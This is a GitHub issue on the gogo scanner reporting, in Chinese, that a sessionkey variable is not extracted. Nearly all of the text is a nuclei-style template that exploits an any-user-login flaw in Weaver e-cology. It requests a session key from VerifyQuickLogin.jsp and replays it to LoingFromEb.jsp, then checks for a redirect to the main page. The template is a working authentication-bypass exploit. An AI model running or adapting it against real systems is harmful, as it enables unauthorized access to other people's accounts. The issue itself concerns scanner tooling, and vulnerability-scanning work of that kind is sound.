### ISSUE TITLE
无法正常提取到sessionkey中间变量

### ISSUE THREAD

**Issue by Geekby** [chainreactors/gogo#36]
```yaml
id: ecology-VerifyQuickLogin-any-user-login

info:
  name: ecology-VerifyQuickLogin-any-user-login
  severity: critical
  tags: "泛微 weaver"

requests:
  - raw:
      - |
        POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        identifier=1&language=1&ipaddress=1.1.1.1

      - |
        POST /mobile/plugin/plus/login/LoingFromEb.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        loginkey={{session}}

    req-condition: true
    extractors:
      - type: regex
        part: body
        group: 1
        internal: true
        name: session
        regex:
          - 'sessionkey":"(.*)"'

    matchers:
      - type: word
        part: body
        words:
          - "RedirectFile=/wui/main.jsp"

```
